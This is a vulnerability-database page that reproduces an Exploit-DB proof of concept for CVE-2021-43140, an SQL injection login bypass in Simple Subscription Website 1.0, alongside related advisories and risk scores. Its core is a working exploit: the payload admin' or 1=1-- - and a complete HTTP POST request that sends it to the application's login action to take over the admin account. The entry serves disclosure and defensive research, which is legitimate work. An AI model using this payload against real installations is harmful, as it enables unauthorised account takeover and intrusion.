Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Simple Subscription Website 1.0 - SQLi Authentication Bypass

🗓️ 15 Nov 2021 00:00:00Reported by Daniel HaroType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 370 Views

Simple Subscription Website 1.0 SQL Injection Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Simple Subscription Website 1.0 - SQL injection Authentication Bypass Vulnerability
15 Nov 202100:00
zdt
Circl		CVE-2021-43140
3 Nov 202121:23
circl
CNNVD		Simple Subscription Website SQL注入漏洞
3 Nov 202100:00
cnnvd
CNVD		Sourcecodester Simple Subscription Website SQL Injection Vulnerability
4 Nov 202100:00
cnvd
CVE		CVE-2021-43140
3 Nov 202118:38
cve
Cvelist		CVE-2021-43140
3 Nov 202118:38
cvelist
EUVD		EUVD-2021-30088
3 Oct 202520:07
euvd
NVD		CVE-2021-43140
3 Nov 202119:15
nvd
OSV		CVE-2021-43140
3 Nov 202119:15
osv
Packet Storm		Simple Subscription Website 1.0 SQL Injection
15 Nov 202100:00
packetstorm
Rows per page
# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
# Exploit Author: Daniel Haro (Dirox)
# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Version: Simple Subscription Website 1.0
# Tested on: Windows, xampp
# CVE: CVE-2021-43140

- Description:
SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -

PoC:

POST /plan_application/Actions.php?a=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/plan_application/admin/login.php
Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3

username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Nov 2021 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.00736
subscription websitesql injectionauthentication bypass
370